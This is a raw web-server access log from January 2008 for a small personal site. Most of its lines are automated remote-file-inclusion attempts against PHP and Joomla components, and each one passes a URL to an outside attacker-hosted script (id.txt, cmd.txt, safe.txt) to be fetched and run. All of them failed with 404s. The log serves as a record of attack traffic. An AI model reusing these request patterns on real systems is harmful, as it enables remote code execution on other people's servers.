195.62.20.5 - - [16/Jan/2008:07:05:16 -0800] "GET /logs/!scanhttp://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.52.230.10 - - [16/Jan/2008:07:05:31 -0800] "GET /logs/access_071228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.62.20.5 - - [16/Jan/2008:07:07:55 -0800] "GET /logs/access_071230.log/!scanhttp://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.145.104 - - [16/Jan/2008:07:08:20 -0800] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [16/Jan/2008:07:08:20 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [16/Jan/2008:07:08:21 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.153 - - [16/Jan/2008:07:09:18 -0800] "GET /bikes/dteel/15JAN08/ HTTP/1.0" 200 694 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.145.104 - - [16/Jan/2008:07:10:22 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [16/Jan/2008:07:11:52 -0800] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.246.56 - - [16/Jan/2008:07:12:04 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:07:12:30 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:07:12:30 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:07:12:31 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.73 - - [16/Jan/2008:07:12:42 -0800] "GET /bikes/dteel/15JAN08/?S=A HTTP/1.0" 200 694 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.152.1.228 - - [16/Jan/2008:07:13:38 -0800] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [16/Jan/2008:07:13:39 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [16/Jan/2008:07:13:40 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/Jan/2008:07:14:02 -0800] "GET /index.php?id=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
209.216.249.194 - - [16/Jan/2008:07:14:02 -0800] "GET /logs/index.php?id=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.6.24.81 - - [16/Jan/2008:07:14:37 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.176.228.30 - - [16/Jan/2008:07:14:54 -0800] "GET /config.php?path_to_root=http://www.mobilitalavorativa.it/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.45 - - [16/Jan/2008:07:16:37 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.5.54.68 - - [16/Jan/2008:07:17:41 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.nakedarena.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [16/Jan/2008:07:17:41 -0800] "GET /config.php?path_to_root=http://www.nakedarena.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [16/Jan/2008:07:17:41 -0800] "GET /logs/config.php?path_to_root=http://www.nakedarena.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.4.3 - - [16/Jan/2008:07:17:42 -0800] "GET /logs/access_071225.log/index1.php?os=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [16/Jan/2008:07:17:42 -0800] "GET /index1.php?os=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [16/Jan/2008:07:17:42 -0800] "GET /logs/index1.php?os=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [16/Jan/2008:07:18:07 -0800] "GET /logs/access_071230.log/index1.php?os=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.152.1.228 - - [16/Jan/2008:07:18:47 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.54.68 - - [16/Jan/2008:07:18:47 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://www.nakedarena.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.82.17.220 - - [16/Jan/2008:07:20:02 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=ftp://200.27.59.22/.xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.17.220 - - [16/Jan/2008:07:20:02 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://200.27.59.22/.xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.17.220 - - [16/Jan/2008:07:20:02 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://200.27.59.22/.xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.0.141.110 - - [16/Jan/2008:07:21:21 -0800] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [16/Jan/2008:07:21:22 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [16/Jan/2008:07:21:23 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
128.49.185.167 - - [16/Jan/2008:07:21:39 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
219.94.145.104 - - [16/Jan/2008:07:22:47 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.152.1.228 - - [16/Jan/2008:07:23:35 -0800] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.49.185.167 - - [16/Jan/2008:07:23:39 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/newreply.php?do=newreply&p=368120" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
193.254.190.163 - - [16/Jan/2008:07:24:15 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.30 - - [16/Jan/2008:07:24:20 -0800] "GET /logs/access_071203.log/////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.30 - - [16/Jan/2008:07:24:20 -0800] "GET /////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.30 - - [16/Jan/2008:07:24:20 -0800] "GET /logs/////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.0.141.110 - - [16/Jan/2008:07:24:28 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
219.94.145.104 - - [16/Jan/2008:07:24:54 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.228.30 - - [16/Jan/2008:07:26:12 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.mobilitalavorativa.it/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [16/Jan/2008:07:26:12 -0800] "GET /config.php?path_to_root=http://www.mobilitalavorativa.it/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [16/Jan/2008:07:26:13 -0800] "GET /logs/config.php?path_to_root=http://www.mobilitalavorativa.it/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.0.141.110 - - [16/Jan/2008:07:26:33 -0800] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.11.230.30 - - [16/Jan/2008:07:26:37 -0800] "GET /logs/access_071221.log/////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.176.228.30 - - [16/Jan/2008:07:28:02 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://www.mobilitalavorativa.it/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:07:29:01 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:07:29:01 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
89.110.131.88 - - [16/Jan/2008:07:29:05 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.110.131.88 - - [16/Jan/2008:07:29:10 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.208.187.75 - - [16/Jan/2008:07:29:40 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?p=368440" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
64.34.145.198 - - [16/Jan/2008:07:29:55 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.198 - - [16/Jan/2008:07:29:58 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:30:07 -0800] "GET /logs/access_071228.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:30:07 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:30:07 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.254.190.163 - - [16/Jan/2008:07:30:22 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.145.104 - - [16/Jan/2008:07:30:46 -0800] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:07:31:27 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:07:31:30 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:07:31:30 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.10.144.175 - - [16/Jan/2008:07:31:33 -0800] "GET /logs/access_071228.log//content/multithumb?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.144.175 - - [16/Jan/2008:07:31:33 -0800] "GET //content/multithumb?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.144.175 - - [16/Jan/2008:07:31:34 -0800] "GET /logs//content/multithumb?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.145.198 - - [16/Jan/2008:07:31:38 -0800] "GET /minamijewelry/html/schedule.html HTTP/1.0" 200 12759 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
69.10.144.175 - - [16/Jan/2008:07:31:54 -0800] "GET /logs/access_071225.log//content/multithumb?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:07:31:59 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.82.17.220 - - [16/Jan/2008:07:32:00 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=ftp://200.27.59.22/.xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.160.107.168 - - [16/Jan/2008:07:33:16 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:28 -0800] "GET /logs/access_071228.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:28 -0800] "GET /logs/access_071228.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:28 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:28 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:28 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:28 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:30 -0800] "GET /logs/access_071228.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:31 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:31 -0800] "GET /logs/access_071228.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:31 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [16/Jan/2008:07:33:32 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.106.251.51 - - [16/Jan/2008:07:34:58 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [16/Jan/2008:07:34:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.0.141.110 - - [16/Jan/2008:07:35:17 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:07:35:50 -0800] "GET /logs/////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:07:35:51 -0800] "GET /////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.0.141.110 - - [16/Jan/2008:07:37:17 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
195.7.164.35 - - [16/Jan/2008:07:40:58 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.alfastyle.ro/red/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
195.7.164.35 - - [16/Jan/2008:07:41:02 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.alfastyle.ro/red/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.7.201.206 - - [16/Jan/2008:07:42:00 -0800] "GET //content/multithumb?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
172.173.89.24 - - [16/Jan/2008:07:42:56 -0800] "GET /logs/access_071220.log HTTP/1.1" 200 140699 "-" "iuwirkcdoljmwilhwrojhq6ltlm6rlpfxdjrhp" "www.dmulk.com"
75.0.141.110 - - [16/Jan/2008:07:43:32 -0800] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:44:43 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:44:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:44:44 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:44:50 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:44:50 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:44:51 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:44:59 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:44:59 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:45:00 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:07:45:09 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
